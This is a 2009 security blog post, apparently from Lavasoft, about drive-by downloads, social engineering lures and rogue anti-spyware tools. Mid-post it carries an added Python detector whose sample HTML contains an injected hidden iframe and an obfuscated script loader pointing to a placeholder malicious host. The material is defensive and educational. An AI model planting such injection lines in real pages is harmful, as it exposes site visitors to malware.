The Nature of Today's Malware Infections

by Albin on April 22nd, 2009 in Security Tips.

The nature of malware infections has changed during the past years. A long time ago, malware and viruses were spread in much less sophisticated ways. (1) Times are not the same anymore, because malware authors constantly invent new, ingenious ways to compromise machines. The target has moved from the computer itself to a full focus on the user. Lavasoft Malware Labs has seen a major increase in obfuscated downloads which make use of social engineering tricks. Nowadays, users oftentimes infect their own machine by making an interactive choice. The lures range from enticing text and email attachments to URL links and fake online scanners.

The average Joe is not aware of what is happening behind the scenes. They only use the Internet as a daily instrument for shopping, social networking, reading, blogging, bank business, games, etc.

It’s even possible to be lured on legitimate websites - malware authors simply redirect victims to sites which connect to servers hosting malware. In the blink of an eye, a jungle of new suspicious applications is running stealthily in the background without any user interaction. This stealth method is called a drive-by download, and it often leads to even more social engineering tricks. The most common scenario (social engineering trick) is that a rogue anti-spyware application (fraud tool) ends up on the system and asks the user to purchase a registered version to remove threats which do not exist.

Drive-by downloads make use of vulnerabilities in the current web browser and may download, for example, Java and PHP scripts which are executed on the local machine. The scripts are written to connect to remote servers hosting malicious exploits.
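As an added example (not code from the original post or from Lavasoft), here is a small check a defender can run over a page's HTML for two injection patterns typical of the compromised-site redirects described above: invisible iframes and obfuscated script writes. The sample HTML and the domain in it are constructed for illustration.

```python
import re
from html.parser import HTMLParser

# Constructed sample: a legitimate-looking page with an injected, invisible
# iframe and an obfuscated script loader (hypothetical domain, not from the article).
SAMPLE_HTML = """
<html><body>
<h1>Company news</h1>
<p>Welcome to our site.</p>
<iframe src="http://malicious.example/in.cgi?3" width="0" height="0"
        style="visibility:hidden"></iframe>
<script>document.write(unescape('%3Cscript src=%22http://malicious.example/x.js%22%3E%3C/script%3E'))</script>
</body></html>
"""

class DriveByIndicatorParser(HTMLParser):
    """Collects (indicator, detail) pairs for hidden iframes and obfuscated script writes."""
    def __init__(self):
        super().__init__()
        self.findings = []
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "iframe":
            style = (a.get("style") or "").replace(" ", "").lower()
            tiny = a.get("width") in ("0", "1") or a.get("height") in ("0", "1")
            hidden = "display:none" in style or "visibility:hidden" in style
            if tiny or hidden:
                self.findings.append(("hidden_iframe", a.get("src", "")))
        elif tag == "script":
            self._in_script = True

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        # Script bodies arrive here as CDATA; flag the classic unescape() loader.
        if self._in_script and re.search(r"document\.write\s*\(\s*unescape\s*\(", data):
            self.findings.append(("obfuscated_script_write", data.strip()[:60]))

def scan_html(html):
    """Return the list of drive-by indicators found in the given HTML."""
    parser = DriveByIndicatorParser()
    parser.feed(html)
    return parser.findings
```

A zero-size or hidden iframe is not proof of compromise on its own, so treat a hit as a trigger for review of the page source rather than a verdict.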

Researchers at ScanSafe have statistics that show a major increase in browser-attack infections during the last decade. (1)

“74 percent of all malware spotted in the third quarter 2008 came from visits to compromised Web sites.” (1)

The Google Anti-Malware team also made an in-depth investigation of billions of web pages. The result was sensational - more than three million URLs were exposed to drive-by malware downloads. (1)

The test results from Google and ScanSafe indicate that the probability of being exposed to this sort of attack is high. The easiest prevention methods are to constantly install the latest patches for web browsers, the Windows OS and other frequently used third-party applications. Most of the popular browsers (Mozilla, Internet Explorer and Opera) have features to block blacklisted sites. (1) They also contain controls for disabling or restricting various scripts. Install anti-spyware/anti-virus applications and make sure to keep the definition files updated. The most important thing is to use common sense while surfing the web.

(1) VirusList, Drive-by Downloads. “The Web Under Siege”. h**p:// viruslist.com/en/analysis?pubid=204792056. Retrieved on 2009-04-22

Albin Bodahl 

Lavasoft Malware Labs